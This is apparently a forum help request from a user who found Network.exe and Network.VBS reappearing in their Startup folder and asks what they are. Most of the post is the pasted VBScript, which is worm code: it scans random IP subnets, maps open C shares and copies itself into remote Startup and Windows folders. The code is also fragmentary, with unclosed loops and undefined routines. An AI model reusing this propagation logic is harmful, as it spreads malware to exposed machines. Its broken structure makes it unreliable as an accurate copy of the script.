I have an unattended computer with a fixed internet connection. I run NetMeeting so I can connect to this computer via the Internet, and I also run the dial-up server to allow me to connect by phone. Recently I found two files appeared on my StartUp directory - Network.exe and Network.VBS. These programs are causing problem to my NetMeeting connections everytime the computer is reboot. If I delete them, they will write themselves back while the computer is not accessed. It also writes a log file (Network.log) onto my bootup disk, with the content of a subnet address. It appears that the file Network.VBS is doing the job of logging and rewriting itself back, onto both the StartUP and Windows directory.
My quetion is: Where could this script possibly come from? For What purpose? What fuction does the Network.exe do?Could it be someone knowing my IP address put them in so he can access my files?
The script is as follows:
count = "0"
dot = "."
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
do while driveconnected = "0"
wshnetwork.mapnetworkdrive "j:", sharename
driveconnected = "0"
Set myfile = fso1.createtextfile("c:\network.log", True)
If (fso1.fileexists("c:\network.log")) then
myfile.writeLine("Log file Open")
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile "c:\network.vbs", "j:\"
If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " & sharename)
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
octd = octd + 1
if octd = "255" then randaddress()
sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
' driveconnected = 0
rand = int((254 * rnd) + 1)
if count < 50 then
octa=Int((16) * Rnd + 199)
count=count + 1
myfile.writeLine("Subnet : " & octa & dot & octb & dot & octc & dot & "0")